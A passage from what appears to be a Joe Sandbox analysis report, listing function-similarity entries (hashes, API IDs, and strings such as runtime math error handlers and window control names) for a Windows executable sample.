                                                                        • Opcode Fuzzy Hash: 2751fdadd79cc3ffc02769d349f49088ee270364174e6e284d45ea2163805565
                                                                        • Instruction Fuzzy Hash: 3B3107326087818AE7708F69B444B5AB7A1F789794F504235EBA947BA9CF3DD845CF00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                        • Instruction ID: 8e750a9bce7ddae374ae834e5443a4df2a14b916436ab70d34b3dc2cb7bba625
                                                                        • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                        • Instruction Fuzzy Hash: D2311A36A08781CAE760CF19E44475AB7A1F788794F144235EBA887BA9DF3CD845CB05
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _handle_error
                                                                        • String ID: "$pow
                                                                        • API String ID: 1757819995-713443511
                                                                        • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                        • Instruction ID: 13c025cd996a29fe6538e74017235839afe81fba199032becba70b472b097a5d
                                                                        • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                        • Instruction Fuzzy Hash: 20215C72D1CAC587E370CF14E04466AABA1FBDE348F201325FB8946965CFBDD1859B04
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3678867486-1403004172
                                                                        • Opcode ID: 2b20666184da16acd2d6d3491877ae16e073837e1e892be99d2699d4247cfda1
                                                                        • Instruction ID: 7fd827b154fe6c7922b8be29c02ec4012af756af64ba3af530f3d7d66d786e17
                                                                        • Opcode Fuzzy Hash: 2b20666184da16acd2d6d3491877ae16e073837e1e892be99d2699d4247cfda1
                                                                        • Instruction Fuzzy Hash: 0E118122A19B8191F614DB19D8410B963A1FB9DBA8F444231DBAD877EADE3CD50ACB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3678867486-1403004172
                                                                        • Opcode ID: 0abfc2817ed25deed9a0e18655eb97a5d75c75eb1aeec992e87202f854050b8e
                                                                        • Instruction ID: 47ac6bc8935e40f4cd06265d8285d5ac5e6c245624408aeea14e826f645cbfa7
                                                                        • Opcode Fuzzy Hash: 0abfc2817ed25deed9a0e18655eb97a5d75c75eb1aeec992e87202f854050b8e
                                                                        • Instruction Fuzzy Hash: 8011A322A1DA8191FA24DB18E4511F95361FF8D7C8F844531EB8DC7BAADF2CD609CB10
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3678867486-1403004172
                                                                        • Opcode ID: 4b68288faa5a15cc7d232deff94305a842367b5fb3c5c30fdfadb4679d6d4acd
                                                                        • Instruction ID: 9b5025df7c44f1c37b0fa84e7c10af42ea2bf3600e61969a4e6c2d2a7ab82798
                                                                        • Opcode Fuzzy Hash: 4b68288faa5a15cc7d232deff94305a842367b5fb3c5c30fdfadb4679d6d4acd
                                                                        • Instruction Fuzzy Hash: 50114C22A0D68692EA24D718E5511F95351FF8E788F444131EB8DC7BAADE2CD609CB10
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 3712363035-3916222277
                                                                        • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                        • Instruction ID: cf5a9df5547d66bf14701b493310a03b0364b1df22e5a7bda1c5cc385bb78e58
                                                                        • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                        • Instruction Fuzzy Hash: D4115232A187419AE710CF1AF90056AB7E6FB88788F485135EB4D87A75CF3ED090CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3678867486-1403004172
                                                                        • Opcode ID: 644f3703e788e93edd25f4b597ff0776f93010d0d499e8dd033eb9cd600cdda9
                                                                        • Instruction ID: 9e4ba648e2fcdf406934ff617196126870a97a6fdb5ec391c2ca87f29dc48a31
                                                                        • Opcode Fuzzy Hash: 644f3703e788e93edd25f4b597ff0776f93010d0d499e8dd033eb9cd600cdda9
                                                                        • Instruction Fuzzy Hash: CD019622A1C68292FA24D718E5911FD5360FF8E39CF404131E78DC7AAADF6CD609CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _ctrlfp_handle_error_raise_exc
                                                                        • String ID: !$tan
                                                                        • API String ID: 3384550415-2428968949
                                                                        • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                        • Instruction ID: 91fe84ceb28c9f731382eb6b6b234f23688e6271f43c95f39cf66352f3031cbb
                                                                        • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                        • Instruction Fuzzy Hash: 93018432A28B8545DA14CF16A40033AA252FB9F7D8F105335EA5E0BB98EF7CD1508B00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _ctrlfp_handle_error_raise_exc
                                                                        • String ID: !$cos
                                                                        • API String ID: 3384550415-1949035351
                                                                        • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                        • Instruction ID: 50b711e40c8af22ccd9f71b365588a723e820d91764ad24d990ae1a8650b77b5
                                                                        • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                        • Instruction Fuzzy Hash: 5301B572E28B8981D614CF26940033AA252BF9F7D8F105335EA5A0AB98EF7DD0508B00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _ctrlfp_handle_error_raise_exc
                                                                        • String ID: !$sin
                                                                        • API String ID: 3384550415-1565623160
                                                                        • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                        • Instruction ID: 9115368516e5bd2778df1c5dd9de6aefb9cd21a73dc5a3823414b597af243b28
                                                                        • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                        • Instruction Fuzzy Hash: 1801B172E28B8546DA14CF26940033AA262BF9F7D8F105335EA5A0AB98EF6DD0508B00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _handle_error
                                                                        • String ID: "$exp
                                                                        • API String ID: 1757819995-2878093337
                                                                        • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                        • Instruction ID: 1873d1ee80ad6d3970abc3c7514de5abcfc3202ff71c3e998a55e020b1483b10
                                                                        • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                        • Instruction Fuzzy Hash: 9D01A536928A8886E220CF28D0492AA77B0FFEA358F205315E7451AA70CB7DD5819B00
                                                                        APIs
                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF6BB1475E9
                                                                        • TlsSetValue.KERNEL32(?,?,?,00007FF6BB147241,?,?,?,?,00007FF6BB14660C,?,?,?,?,00007FF6BB144CD3), ref: 00007FF6BB147600
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Valuetry_get_function
                                                                        • String ID: FlsSetValue
                                                                        • API String ID: 738293619-3750699315
                                                                        • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                        • Instruction ID: e7519f92b70acafa326294c189644a249d39ff6b4c24cfe4200a88e4b716d1af
                                                                        • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                        • Instruction Fuzzy Hash: 94E06561A0854281FA454F5DF4004F42372BF4CB9DF984035DB0D86275DE3CE544C610
                                                                        APIs
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6BB145629
                                                                        • _CxxThrowException.LIBVCRUNTIME ref: 00007FF6BB14563A
                                                                          • Part of subcall function 00007FF6BB147018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB14563F), ref: 00007FF6BB14708D
                                                                          • Part of subcall function 00007FF6BB147018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB14563F), ref: 00007FF6BB1470BF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                        • String ID: Unknown exception
                                                                        • API String ID: 3561508498-410509341
                                                                        • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                        • Instruction ID: e8dbd819498cad915ed8b39fcbe7f41113dfde799d4ca221a1dc40ce3ff84230
                                                                        • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                        • Instruction Fuzzy Hash: C9D05E22A1898691DE20EF08E8903A8A330FB9830CFD04431E34CC25B9EF3CD64ADB00